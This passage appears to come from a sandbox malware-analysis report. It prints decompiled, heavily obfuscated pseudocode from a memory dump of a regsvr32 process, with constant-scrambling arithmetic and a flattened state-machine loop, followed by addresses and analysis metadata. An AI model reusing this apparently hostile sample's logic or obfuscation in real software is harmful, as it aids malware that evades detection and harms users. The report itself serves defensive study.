                                                                                                                				_v2780 = _v2780 ^ 0x86fa2b61;
                                                                                                                				_v2780 = _v2780 ^ 0xd078fd42;
                                                                                                                				_v2716 = 0x662694;
                                                                                                                				_v2716 = _v2716 * 0x1c;
                                                                                                                				_v2716 = _v2716 ^ 0x0b2b4179;
                                                                                                                				_v2848 = 0x3fab3b;
                                                                                                                				_v2848 = _v2848 * 0x57;
                                                                                                                				_v2848 = _v2848 + 0xb1b7;
                                                                                                                				_v2848 = _v2848 ^ 0x4663f107;
                                                                                                                				_v2848 = _v2848 ^ 0x53cc49a5;
                                                                                                                				_v2804 = 0xf44b8b;
                                                                                                                				_v2804 = _v2804 ^ 0xcbef5051;
                                                                                                                				_t787 = 0x38;
                                                                                                                				_v2804 = _v2804 * 0x1d;
                                                                                                                				_v2804 = _v2804 ^ 0x021343f5;
                                                                                                                				_v2748 = 0xa523ec;
                                                                                                                				_v2748 = _v2748 ^ 0xe76e4c1f;
                                                                                                                				_v2748 = _v2748 | 0xf57e3de9;
                                                                                                                				_v2748 = _v2748 ^ 0xf7fc61d2;
                                                                                                                				_v2672 = 0x8a6c6a;
                                                                                                                				_v2672 = _v2672 ^ 0x8159647f;
                                                                                                                				_v2672 = _v2672 ^ 0x81d1eba0;
                                                                                                                				_v2668 = 0x14c691;
                                                                                                                				_v2668 = _v2668 * 0x1f;
                                                                                                                				_v2668 = _v2668 ^ 0x028c2397;
                                                                                                                				_v2772 = 0xa14e1;
                                                                                                                				_v2772 = _v2772 | 0x19f1b858;
                                                                                                                				_v2772 = _v2772 << 2;
                                                                                                                				_v2772 = _v2772 ^ 0x67e88e1f;
                                                                                                                				_v2880 = 0x9fa027;
                                                                                                                				_v2880 = _v2880 ^ 0xc144da70;
                                                                                                                				_v2880 = _v2880 + 0x5be6;
                                                                                                                				_v2880 = _v2880 / _t787;
                                                                                                                				_v2880 = _v2880 ^ 0x037ae0c9;
                                                                                                                				_v2928 = 0x3abeda;
                                                                                                                				_v2928 = _v2928 ^ 0x65736d93;
                                                                                                                				_v2928 = _v2928 + 0xffff310e;
                                                                                                                				_v2928 = _v2928 >> 4;
                                                                                                                				_v2928 = _v2928 ^ 0x065963c7;
                                                                                                                				_v2640 = 0x16f4bd;
                                                                                                                				_v2640 = _v2640 * 0xe;
                                                                                                                				_v2640 = _v2640 ^ 0x014d995f;
                                                                                                                				_v2856 = 0x730f71;
                                                                                                                				_v2856 = _v2856 << 0xb;
                                                                                                                				_v2856 = _v2856 >> 0xa;
                                                                                                                				_v2856 = _v2856 << 5;
                                                                                                                				_v2856 = _v2856 ^ 0x04cf5b82;
                                                                                                                				_v2920 = 0xf51a1d;
                                                                                                                				_v2920 = _v2920 >> 6;
                                                                                                                				_v2920 = _v2920 + 0xffff790e;
                                                                                                                				_v2920 = _v2920 + 0xffff8eb8;
                                                                                                                				_v2920 = _v2920 ^ 0x000b35f2;
                                                                                                                				_v2724 = 0xc9e4e6;
                                                                                                                				_v2724 = _v2724 >> 8;
                                                                                                                				_v2724 = _v2724 ^ 0x0007ad00;
                                                                                                                				_v2912 = 0x6a366d;
                                                                                                                				_v2912 = _v2912 >> 0xe;
                                                                                                                				_v2912 = _v2912 + 0xfffff0e4;
                                                                                                                				_v2912 = _v2912 + 0xca29;
                                                                                                                				_v2912 = _v2912 ^ 0x000b8696;
                                                                                                                				_v2756 = 0xad1b1;
                                                                                                                				_v2756 = _v2756 >> 0xf;
                                                                                                                				_v2756 = _v2756 >> 0x10;
                                                                                                                				_v2756 = _v2756 ^ 0x0009a54d;
                                                                                                                				_v2796 = 0x33c6c6;
                                                                                                                				_v2796 = _v2796 | 0x67dfdf79;
                                                                                                                				_v2796 = _v2796 ^ 0x67fc33cd;
                                                                                                                				_v2736 = 0x18acfe;
                                                                                                                				_v2736 = _v2736 * 0x2a;
                                                                                                                				_v2736 = _v2736 ^ 0x0403da01;
                                                                                                                				_v2660 = 0x33d7fb;
                                                                                                                				_v2660 = _v2660 * 0x16;
                                                                                                                				_v2660 = _v2660 ^ 0x0476d0c2;
                                                                                                                				_v2840 = 0xb3cfa4;
                                                                                                                				_v2840 = _v2840 >> 4;
                                                                                                                				_v2840 = _v2840 << 0xb;
                                                                                                                				_v2840 = _v2840 << 7;
                                                                                                                				_v2840 = _v2840 ^ 0xf3eb746f;
                                                                                                                				_v2904 = 0x4128b5;
                                                                                                                				_t862 = 0x45;
                                                                                                                				_v2904 = _v2904 / _t862;
                                                                                                                				_t788 = 0xc;
                                                                                                                				_t782 = 0x6c;
                                                                                                                				_v2904 = _v2904 * 0x73;
                                                                                                                				_v2904 = _v2904 | 0xe6a63561;
                                                                                                                				_v2904 = _v2904 ^ 0xe6ef689d;
                                                                                                                				_v2872 = 0x23c8cf;
                                                                                                                				_v2872 = _v2872 * 0x60;
                                                                                                                				_v2872 = _v2872 << 7;
                                                                                                                				_v2872 = _v2872 ^ 0x0312d5df;
                                                                                                                				_v2872 = _v2872 ^ 0xb6b6220d;
                                                                                                                				_v2656 = 0xc7c9d4;
                                                                                                                				_v2656 = _v2656 / _t788;
                                                                                                                				_v2656 = _v2656 ^ 0x0013e48d;
                                                                                                                				_v2684 = 0xc1de2e;
                                                                                                                				_v2684 = _v2684 << 6;
                                                                                                                				_v2684 = _v2684 ^ 0x307445df;
                                                                                                                				_v2908 = 0x8efd4b;
                                                                                                                				_v2908 = _v2908 ^ 0x938b2fc9;
                                                                                                                				_v2908 = _v2908 << 0xd;
                                                                                                                				_v2908 = _v2908 / _t782;
                                                                                                                				_v2908 = _v2908 ^ 0x01bff107;
                                                                                                                				_v2916 = 0x57c251;
                                                                                                                				_v2916 = _v2916 / _t862;
                                                                                                                				_v2916 = _v2916 << 3;
                                                                                                                				_v2916 = _v2916 | 0x63b3f351;
                                                                                                                				_v2916 = _v2916 ^ 0x63b1fd09;
                                                                                                                				_v2792 = 0x618ad3;
                                                                                                                				_v2792 = _v2792 >> 2;
                                                                                                                				_t789 = 0x78;
                                                                                                                				_v2792 = _v2792 * 0x7f;
                                                                                                                				_v2792 = _v2792 ^ 0x0c16deab;
                                                                                                                				_v2800 = 0xd1b694;
                                                                                                                				_v2800 = _v2800 << 5;
                                                                                                                				_v2800 = _v2800 << 2;
                                                                                                                				_v2800 = _v2800 ^ 0x68d421c3;
                                                                                                                				_v2732 = 0xf908e9;
                                                                                                                				_v2732 = _v2732 << 4;
                                                                                                                				_v2732 = _v2732 ^ 0x0f915e9f;
                                                                                                                				_v2776 = 0x4b71bd;
                                                                                                                				_v2776 = _v2776 << 0x10;
                                                                                                                				_v2776 = _v2776 + 0xec33;
                                                                                                                				_v2776 = _v2776 ^ 0x71baf019;
                                                                                                                				_v2900 = 0xd9d679;
                                                                                                                				_v2900 = _v2900 << 6;
                                                                                                                				_v2900 = _v2900 * 0x52;
                                                                                                                				_v2900 = _v2900 << 0xe;
                                                                                                                				_v2900 = _v2900 ^ 0x2c232e41;
                                                                                                                				_v2648 = 0xd12b32;
                                                                                                                				_v2648 = _v2648 | 0x74e47b5c;
                                                                                                                				_v2648 = _v2648 ^ 0x74fd2515;
                                                                                                                				_v2784 = 0xd7e3e1;
                                                                                                                				_v2784 = _v2784 / _t789;
                                                                                                                				_v2784 = _v2784 ^ 0x3d96c0ba;
                                                                                                                				_v2784 = _v2784 ^ 0x3d9f1646;
                                                                                                                				_v2676 = 0x636ad3;
                                                                                                                				_v2676 = _v2676 | 0x5b3da741;
                                                                                                                				_v2676 = _v2676 ^ 0x5b732082;
                                                                                                                				_v2896 = 0x3505cb;
                                                                                                                				_v2896 = _v2896 ^ 0x34607be3;
                                                                                                                				_v2896 = _v2896 | 0x36f61c3b;
                                                                                                                				_v2896 = _v2896 ^ 0x64d6e971;
                                                                                                                				_v2896 = _v2896 ^ 0x522ade29;
                                                                                                                				_v2708 = 0xe6bb5d;
                                                                                                                				_v2708 = _v2708 ^ 0x2001a0b1;
                                                                                                                				_v2708 = _v2708 ^ 0x20e0752c;
                                                                                                                				_v2788 = 0x1e0f5a;
                                                                                                                				_v2788 = _v2788 ^ 0xc80b17f8;
                                                                                                                				_v2788 = _v2788 + 0xffff3a3b;
                                                                                                                				_v2788 = _v2788 ^ 0xc81e2fe4;
                                                                                                                				_v2704 = 0x57b7aa;
                                                                                                                				_v2704 = _v2704 << 1;
                                                                                                                				_v2704 = _v2704 ^ 0x00a3a143;
                                                                                                                				_v2712 = 0x14a837;
                                                                                                                				_v2712 = _v2712 ^ 0xfc28968d;
                                                                                                                				_v2712 = _v2712 ^ 0xfc32f9c6;
                                                                                                                				_v2700 = 0xbe166b;
                                                                                                                				_v2700 = _v2700 ^ 0x376b6bd2;
                                                                                                                				_v2700 = _v2700 ^ 0x37df03cf;
                                                                                                                				_v2888 = 0x93f92f;
                                                                                                                				_t790 = 0x29;
                                                                                                                				_v2888 = _v2888 * 0x6a;
                                                                                                                				_v2888 = _v2888 << 4;
                                                                                                                				_v2888 = _v2888 + 0xffff8eb1;
                                                                                                                				_v2888 = _v2888 ^ 0xd45d2676;
                                                                                                                				_v2864 = 0xc62b98;
                                                                                                                				_v2864 = _v2864 + 0x368f;
                                                                                                                				_v2864 = _v2864 << 1;
                                                                                                                				_v2864 = _v2864 + 0xffff5f1f;
                                                                                                                				_v2864 = _v2864 ^ 0x018c8492;
                                                                                                                				_v2644 = 0xe494a2;
                                                                                                                				_v2644 = _v2644 / _t790;
                                                                                                                				_v2644 = _v2644 ^ 0x000fa805;
                                                                                                                				_v2816 = 0x14bc76;
                                                                                                                				_v2816 = _v2816 + 0xffff6b05;
                                                                                                                				_v2816 = _v2816 | 0xcbc3cf74;
                                                                                                                				_v2816 = _v2816 ^ 0xcbd90f84;
                                                                                                                				_v2932 = 0x263bc1;
                                                                                                                				_v2932 = _v2932 + 0xffffe974;
                                                                                                                				_t791 = 0x12;
                                                                                                                				_v2932 = _v2932 * 0x4b;
                                                                                                                				_v2932 = _v2932 >> 9;
                                                                                                                				_v2932 = _v2932 ^ 0x00057b1a;
                                                                                                                				_v2828 = 0xfe7f90;
                                                                                                                				_v2828 = _v2828 * 0x27;
                                                                                                                				_v2828 = _v2828 ^ 0x416b71e4;
                                                                                                                				_v2828 = _v2828 ^ 0x67ac9e72;
                                                                                                                				_v2940 = 0x916b3a;
                                                                                                                				_v2940 = _v2940 / _t791;
                                                                                                                				_v2940 = _v2940 + 0xffffc7da;
                                                                                                                				_v2940 = _v2940 << 0xf;
                                                                                                                				_v2940 = _v2940 ^ 0xee0257da;
                                                                                                                				_v2764 = 0x371bc7;
                                                                                                                				_v2764 = _v2764 + 0x748a;
                                                                                                                				_v2764 = _v2764 + 0xffd2;
                                                                                                                				_v2764 = _v2764 ^ 0x0037de40;
                                                                                                                				_v2652 = 0x5ca484;
                                                                                                                				_v2652 = _v2652 << 1;
                                                                                                                				_v2652 = _v2652 ^ 0x00b1de82;
                                                                                                                				_v2924 = 0xceca1c;
                                                                                                                				_v2924 = _v2924 >> 7;
                                                                                                                				_v2924 = _v2924 | 0x18ebbb65;
                                                                                                                				_v2924 = _v2924 >> 0xf;
                                                                                                                				_v2924 = _v2924 ^ 0x00026b49;
                                                                                                                				_v2832 = 0x5f4924;
                                                                                                                				_v2832 = _v2832 << 0xc;
                                                                                                                				_t792 = 0x50;
                                                                                                                				_v2832 = _v2832 / _t792;
                                                                                                                				_v2832 = _v2832 ^ 0x03054b31;
                                                                                                                				_v2664 = 0x746b1b;
                                                                                                                				_v2664 = _v2664 ^ 0x4928924a;
                                                                                                                				_v2664 = _v2664 ^ 0x495634ca;
                                                                                                                				_v2692 = 0x59869d;
                                                                                                                				_v2692 = _v2692 + 0xffffefeb;
                                                                                                                				_v2692 = _v2692 ^ 0x005ba4bc;
                                                                                                                				_v2836 = 0x7503fc;
                                                                                                                				_v2836 = _v2836 << 9;
                                                                                                                				_t793 = 0x37;
                                                                                                                				_v2836 = _v2836 * 0x34;
                                                                                                                				_v2836 = _v2836 + 0xffff7657;
                                                                                                                				_v2836 = _v2836 ^ 0x899da61a;
                                                                                                                				_v2844 = 0x25a46d;
                                                                                                                				_v2844 = _v2844 + 0x507b;
                                                                                                                				_v2844 = _v2844 + 0xe7de;
                                                                                                                				_v2844 = _v2844 ^ 0x1795686d;
                                                                                                                				_v2844 = _v2844 ^ 0x17b10779;
                                                                                                                				_v2852 = 0x514f8a;
                                                                                                                				_v2852 = _v2852 / _t793;
                                                                                                                				_t794 = 0x38;
                                                                                                                				_v2852 = _v2852 * 0x21;
                                                                                                                				_v2852 = _v2852 + 0xfffff57f;
                                                                                                                				_v2852 = _v2852 ^ 0x003d7ccd;
                                                                                                                				_v2860 = 0xb7dac6;
                                                                                                                				_v2860 = _v2860 + 0xd92e;
                                                                                                                				_v2860 = _v2860 + 0xbe66;
                                                                                                                				_v2860 = _v2860 ^ 0xdcd1d129;
                                                                                                                				_v2860 = _v2860 ^ 0xdc6851e7;
                                                                                                                				_v2876 = 0xed64fb;
                                                                                                                				_v2876 = _v2876 / _t782;
                                                                                                                				_v2876 = _v2876 * 0x61;
                                                                                                                				_v2876 = _v2876 + 0xfffff8b0;
                                                                                                                				_v2876 = _v2876 ^ 0x00d937ca;
                                                                                                                				_v2696 = 0x74014f;
                                                                                                                				_v2696 = _v2696 >> 1;
                                                                                                                				_v2696 = _v2696 ^ 0x0033813e;
                                                                                                                				_v2868 = 0xf765d3;
                                                                                                                				_v2868 = _v2868 * 0x6b;
                                                                                                                				_v2868 = _v2868 << 1;
                                                                                                                				_v2868 = _v2868 >> 7;
                                                                                                                				_v2868 = _v2868 ^ 0x0195d618;
                                                                                                                				_v2688 = 0x1e6ce4;
                                                                                                                				_v2688 = _v2688 / _t794;
                                                                                                                				_v2688 = _v2688 ^ 0x000657ad;
                                                                                                                				_v2744 = 0x83a67e;
                                                                                                                				_t795 = 0x3d;
                                                                                                                				_v2744 = _v2744 * 0x6a;
                                                                                                                				_v2744 = _v2744 + 0x64ff;
                                                                                                                				_v2744 = _v2744 ^ 0x368cba62;
                                                                                                                				_v2740 = 0xb82ec2;
                                                                                                                				_v2740 = _v2740 + 0xa010;
                                                                                                                				_v2740 = _v2740 ^ 0x00bae81e;
                                                                                                                				_v2680 = 0x7d2d5e;
                                                                                                                				_v2680 = _v2680 / _t795;
                                                                                                                				_v2680 = _v2680 ^ 0x000586e8;
                                                                                                                				_t749 = E001A8CE7();
                                                                                                                				_t863 = _v2740;
                                                                                                                				_t783 = _t749;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t750 = 0x258eaf2;
                                                                                                                					do {
                                                                                                                						while(1) {
                                                                                                                							L2:
                                                                                                                							_t879 = _t864 - 0x7a80817;
                                                                                                                							if(_t879 > 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(_t879 == 0) {
                                                                                                                								_t756 = E001B7E3D(_v2632, _v2704, _v2636, _v2712);
                                                                                                                								_t863 = _t756;
                                                                                                                								__eflags = _t756;
                                                                                                                								_t750 = 0x258eaf2;
                                                                                                                								_pop(_t795);
                                                                                                                								_t864 =  !=  ? 0x258eaf2 : 0xaed86a1;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t864 == 0x404cf9) {
                                                                                                                									_t795 = _v2884;
                                                                                                                									E001A3466(_v2884, _v2752, _v2884, _v2884,  &_v1044, _v2892, _v2884, _v2720, _v2760, _v2728);
                                                                                                                									_t870 =  &(_t870[8]);
                                                                                                                									_t864 = 0x4c47ac2;
                                                                                                                									while(1) {
                                                                                                                										L1:
                                                                                                                										_t750 = 0x258eaf2;
                                                                                                                										goto L2;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									if(_t864 == 0x20cde6c) {
                                                                                                                										_v2624 = E001AA82D();
                                                                                                                										_v2620 = 2 + E001B0184(_v2908, _v2916, _t761, _v2792, _v2800) * 2;
                                                                                                                										_t795 = _v2732;
                                                                                                                										_t750 = E001B68C8(_v2732, _t783, _v2768, _v2908, _t783, _v2776, _v2908,  &_v2628, _v2900, _v2648, _t783, _v2784, _v2676);
                                                                                                                										_t870 =  &(_t870[0xe]);
                                                                                                                										__eflags = _t750;
                                                                                                                										if(__eflags != 0) {
                                                                                                                											_t864 = 0x26113c1;
                                                                                                                											while(1) {
                                                                                                                												L1:
                                                                                                                												_t750 = 0x258eaf2;
                                                                                                                												goto L2;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										if(_t864 == _t750) {
                                                                                                                											_push(_v2644);
                                                                                                                											_push(0x1a11f8);
                                                                                                                											_push(_v2864);
                                                                                                                											_t866 = E001BF5D9(_v2700, _v2888, __eflags);
                                                                                                                											E001AD467(_v2932, __eflags, _v2828,  &_v2604, _v2700, _v2940, _t863, _v2764, _t866,  &_v524,  &_v1044, _v2652);
                                                                                                                											_t795 = _t866;
                                                                                                                											E001BF94B(_t866, _v2924, _v2832, _v2664, _v2692);
                                                                                                                											_t870 =  &(_t870[0x10]);
                                                                                                                											_t864 = 0x893dd53;
                                                                                                                											while(1) {
                                                                                                                												L1:
                                                                                                                												_t750 = 0x258eaf2;
                                                                                                                												goto L2;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											if(_t864 == 0x26113c1) {
                                                                                                                												_t795 =  &_v2636;
                                                                                                                												E001AA4DE( &_v2636, _v2896, _v2708,  &_v2628, _v2788);
                                                                                                                												_t870 =  &(_t870[3]);
                                                                                                                												asm("sbb esi, esi");
                                                                                                                												_t864 = (_t864 & 0xff9e5dab) + 0x809aa6c;
                                                                                                                												while(1) {
                                                                                                                													L1:
                                                                                                                													_t750 = 0x258eaf2;
                                                                                                                													goto L2;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t884 = _t864 - 0x4c47ac2;
                                                                                                                												if(_t864 != 0x4c47ac2) {
                                                                                                                													goto L25;
                                                                                                                												} else {
                                                                                                                													E001C0575(_v2936, _v2824, _t884, _t795,  &_v2084, _v2820);
                                                                                                                													 *((short*)(E001A2263( &_v2084, _v2812, _v2780, _v2716))) = 0;
                                                                                                                													E001B9054(_v2848,  &_v1564, _t884, _v2804, _v2748, _v2672);
                                                                                                                													_push(_v2928);
                                                                                                                													_push(0x1a1188);
                                                                                                                													_push(_v2880);
                                                                                                                													E001B8EB3( &_v2084, _t884, _v2640, _v2668, _v2856,  &_v2604, _v2920, E001BF5D9(_v2668, _v2772, _t884), _v2724);
                                                                                                                													E001BF94B(_t778, _v2912, _v2756, _v2796, _v2736);
                                                                                                                													_t795 =  &_v2604;
                                                                                                                													_t750 = E001C05F6( &_v2604, _t869, _v2660, _v2840, _v2904, _v2872);
                                                                                                                													_t870 =  &(_t870[0x19]);
                                                                                                                													if(_t750 != 0) {
                                                                                                                														_t864 = 0x20cde6c;
                                                                                                                														while(1) {
                                                                                                                															L1:
                                                                                                                															_t750 = 0x258eaf2;
                                                                                                                															goto L2;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L26;
                                                                                                                						}
                                                                                                                						__eflags = _t864 - 0x809aa6c;
                                                                                                                						if(_t864 == 0x809aa6c) {
                                                                                                                							E001B02D8(_v2628, _v2744, _v2740, _v2680);
                                                                                                                							_pop(_t795);
                                                                                                                							_t864 = 0x1afddb0;
                                                                                                                							_t750 = 0x258eaf2;
                                                                                                                							goto L25;
                                                                                                                						} else {
                                                                                                                							__eflags = _t864 - 0x893dd53;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t795 = _v2836;
                                                                                                                								E001B4E54(_v2836, 1, __eflags,  &_v524, 0, _v2844, 0, _v2852, _v2836, _v2860);
                                                                                                                								_t870 =  &(_t870[7]);
                                                                                                                								_t864 = 0xf8a063e;
                                                                                                                								goto L1;
                                                                                                                							} else {
                                                                                                                								__eflags = _t864 - 0xaed86a1;
                                                                                                                								if(_t864 == 0xaed86a1) {
                                                                                                                									E001B17D2(_v2868, _v2688, _v2636);
                                                                                                                									_pop(_t795);
                                                                                                                									_t864 = 0x809aa6c;
                                                                                                                									while(1) {
                                                                                                                										L1:
                                                                                                                										_t750 = 0x258eaf2;
                                                                                                                										goto L2;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									__eflags = _t864 - 0xf8a063e;
                                                                                                                									if(_t864 != 0xf8a063e) {
                                                                                                                										goto L25;
                                                                                                                									} else {
                                                                                                                										E001B17D2(_v2876, _v2696, _t863);
                                                                                                                										_pop(_t795);
                                                                                                                										_t864 = 0xaed86a1;
                                                                                                                										while(1) {
                                                                                                                											L1:
                                                                                                                											_t750 = 0x258eaf2;
                                                                                                                											goto L2;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						break;
                                                                                                                						L25:
                                                                                                                						__eflags = _t864 - 0x1afddb0;
                                                                                                                					} while (__eflags != 0);
                                                                                                                					L26:
                                                                                                                					return _t750;
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x001ada35
                                                                                                                0x001ada4b
                                                                                                                0x001ada52
                                                                                                                0x001ada5d
                                                                                                                0x001ada68
                                                                                                                0x001ada70
                                                                                                                0x001ada7b
                                                                                                                0x001ada83
                                                                                                                0x001ada8b
                                                                                                                0x001ada98
                                                                                                                0x001ada9c
                                                                                                                0x001adaa4
                                                                                                                0x001adab4
                                                                                                                0x001adab8
                                                                                                                0x001adabd
                                                                                                                0x001adac5
                                                                                                                0x001adacd
                                                                                                                0x001adad8
                                                                                                                0x001adae8
                                                                                                                0x001adae9
                                                                                                                0x001adaf0
                                                                                                                0x001adafb
                                                                                                                0x001adb06
                                                                                                                0x001adb0e
                                                                                                                0x001adb16
                                                                                                                0x001adb21
                                                                                                                0x001adb2c
                                                                                                                0x001adb34
                                                                                                                0x001adb3f
                                                                                                                0x001adb4a
                                                                                                                0x001adb52
                                                                                                                0x001adb5d
                                                                                                                0x001adb68
                                                                                                                0x001adb70
                                                                                                                0x001adb7a
                                                                                                                0x001adb7e
                                                                                                                0x001adb83
                                                                                                                0x001adb8b
                                                                                                                0x001adb96
                                                                                                                0x001adba1
                                                                                                                0x001adbac
                                                                                                                0x001adbc0
                                                                                                                0x001adbc7
                                                                                                                0x001adbd2
                                                                                                                0x001adbdd
                                                                                                                0x001adbe8
                                                                                                                0x001adbf5
                                                                                                                0x001adc00
                                                                                                                0x001adc08
                                                                                                                0x001adc10
                                                                                                                0x001adc18
                                                                                                                0x001adc20
                                                                                                                0x001adc28
                                                                                                                0x001adc33
                                                                                                                0x001adc3e
                                                                                                                0x001adc49
                                                                                                                0x001adc54
                                                                                                                0x001adc5f
                                                                                                                0x001adc6a
                                                                                                                0x001adc75
                                                                                                                0x001adc80
                                                                                                                0x001adc87
                                                                                                                0x001adc92
                                                                                                                0x001adc9d
                                                                                                                0x001adca8
                                                                                                                0x001adcb3
                                                                                                                0x001adcbe
                                                                                                                0x001adcc9
                                                                                                                0x001adcd4
                                                                                                                0x001adce3
                                                                                                                0x001adce6
                                                                                                                0x001adcea
                                                                                                                0x001adcef
                                                                                                                0x001adcf7
                                                                                                                0x001adcff
                                                                                                                0x001add07
                                                                                                                0x001add0f
                                                                                                                0x001add13
                                                                                                                0x001add1b
                                                                                                                0x001add23
                                                                                                                0x001add39
                                                                                                                0x001add40
                                                                                                                0x001add4b
                                                                                                                0x001add56
                                                                                                                0x001add61
                                                                                                                0x001add6c
                                                                                                                0x001add77
                                                                                                                0x001add7f
                                                                                                                0x001add8c
                                                                                                                0x001add8d
                                                                                                                0x001add91
                                                                                                                0x001add96
                                                                                                                0x001add9e
                                                                                                                0x001addb1
                                                                                                                0x001addb8
                                                                                                                0x001addc3
                                                                                                                0x001addce
                                                                                                                0x001adddc
                                                                                                                0x001adde0
                                                                                                                0x001adde8
                                                                                                                0x001added
                                                                                                                0x001addf5
                                                                                                                0x001ade00
                                                                                                                0x001ade0b
                                                                                                                0x001ade16
                                                                                                                0x001ade21
                                                                                                                0x001ade2c
                                                                                                                0x001ade33
                                                                                                                0x001ade3e
                                                                                                                0x001ade46
                                                                                                                0x001ade4b
                                                                                                                0x001ade53
                                                                                                                0x001ade58
                                                                                                                0x001ade60
                                                                                                                0x001ade68
                                                                                                                0x001ade75
                                                                                                                0x001ade7a
                                                                                                                0x001ade7e
                                                                                                                0x001ade86
                                                                                                                0x001ade91
                                                                                                                0x001ade9c
                                                                                                                0x001adea7
                                                                                                                0x001adeb2
                                                                                                                0x001adebd
                                                                                                                0x001adec8
                                                                                                                0x001aded0
                                                                                                                0x001adedc
                                                                                                                0x001adedf
                                                                                                                0x001adee3
                                                                                                                0x001adeeb
                                                                                                                0x001adef3
                                                                                                                0x001adefb
                                                                                                                0x001adf03
                                                                                                                0x001adf0b
                                                                                                                0x001adf13
                                                                                                                0x001adf1b
                                                                                                                0x001adf2b
                                                                                                                0x001adf34
                                                                                                                0x001adf37
                                                                                                                0x001adf3b
                                                                                                                0x001adf43
                                                                                                                0x001adf4b
                                                                                                                0x001adf53
                                                                                                                0x001adf5b
                                                                                                                0x001adf63
                                                                                                                0x001adf6b
                                                                                                                0x001adf73
                                                                                                                0x001adf83
                                                                                                                0x001adf8c
                                                                                                                0x001adf90
                                                                                                                0x001adf98
                                                                                                                0x001adfa0
                                                                                                                0x001adfab
                                                                                                                0x001adfb2
                                                                                                                0x001adfbd
                                                                                                                0x001adfca
                                                                                                                0x001adfce
                                                                                                                0x001adfd2
                                                                                                                0x001adfd7
                                                                                                                0x001adfdf
                                                                                                                0x001adff5
                                                                                                                0x001adffc
                                                                                                                0x001ae007
                                                                                                                0x001ae01a
                                                                                                                0x001ae01b
                                                                                                                0x001ae022
                                                                                                                0x001ae02d
                                                                                                                0x001ae038
                                                                                                                0x001ae043
                                                                                                                0x001ae04e
                                                                                                                0x001ae059
                                                                                                                0x001ae06d
                                                                                                                0x001ae074
                                                                                                                0x001ae086
                                                                                                                0x001ae08b
                                                                                                                0x001ae092
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae099
                                                                                                                0x001ae099
                                                                                                                0x001ae099
                                                                                                                0x001ae099
                                                                                                                0x001ae09f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ae0a5
                                                                                                                0x001ae3d9
                                                                                                                0x001ae3de
                                                                                                                0x001ae3e5
                                                                                                                0x001ae3e7
                                                                                                                0x001ae3ed
                                                                                                                0x001ae3ee
                                                                                                                0x00000000
                                                                                                                0x001ae0ab
                                                                                                                0x001ae0b1
                                                                                                                0x001ae3a7
                                                                                                                0x001ae3ab
                                                                                                                0x001ae3b0
                                                                                                                0x001ae3b3
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae0b7
                                                                                                                0x001ae0bd
                                                                                                                0x001ae2f9
                                                                                                                0x001ae328
                                                                                                                0x001ae35b
                                                                                                                0x001ae362
                                                                                                                0x001ae367
                                                                                                                0x001ae36a
                                                                                                                0x001ae36c
                                                                                                                0x001ae372
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x00000000
                                                                                                                0x001ae094
                                                                                                                0x001ae094
                                                                                                                0x001ae0c3
                                                                                                                0x001ae0c5
                                                                                                                0x001ae249
                                                                                                                0x001ae250
                                                                                                                0x001ae255
                                                                                                                0x001ae26c

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseFolderHandlePath
                                                                                                                • String ID: $I_$,u $3$A.#,$\{t$^-}$m6j$x-${P$[$qkA${`4
                                                                                                                • API String ID: 1943059022-272997853
                                                                                                                • Opcode ID: 5aa7ef3bc3032283710db21069f389e1af563b08daa208b6c499b878d646ac69
                                                                                                                • Instruction ID: f95d04d8c7b88cb5d25f9ac40db7688008839f75825128be40444199838c8b9a
                                                                                                                • Opcode Fuzzy Hash: 5aa7ef3bc3032283710db21069f389e1af563b08daa208b6c499b878d646ac69
                                                                                                                • Instruction Fuzzy Hash: 9B820F715093809FD3B9CF25D58AB8BBBE1BBC5708F10891DE6DA96260D7B08949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001B519C(int __ecx, signed int __edx) {
                                                                                                                				char _v128;
                                                                                                                				char _v256;
                                                                                                                				char _v288;
                                                                                                                				signed int _v292;
                                                                                                                				signed int _v296;
                                                                                                                				intOrPtr _v300;
                                                                                                                				intOrPtr _v304;
                                                                                                                				signed int _v308;
                                                                                                                				signed int _v312;
                                                                                                                				signed int _v316;
                                                                                                                				signed int _v320;
                                                                                                                				signed int _v324;
                                                                                                                				signed int _v328;
                                                                                                                				signed int _v332;
                                                                                                                				signed int _v336;
                                                                                                                				signed int _v340;
                                                                                                                				signed int _v344;
                                                                                                                				signed int _v348;
                                                                                                                				signed int _v352;
                                                                                                                				signed int _v356;
                                                                                                                				signed int _v360;
                                                                                                                				signed int _v364;
                                                                                                                				signed int _v368;
                                                                                                                				signed int _v372;
                                                                                                                				signed int _v376;
                                                                                                                				signed int _v380;
                                                                                                                				signed int _v384;
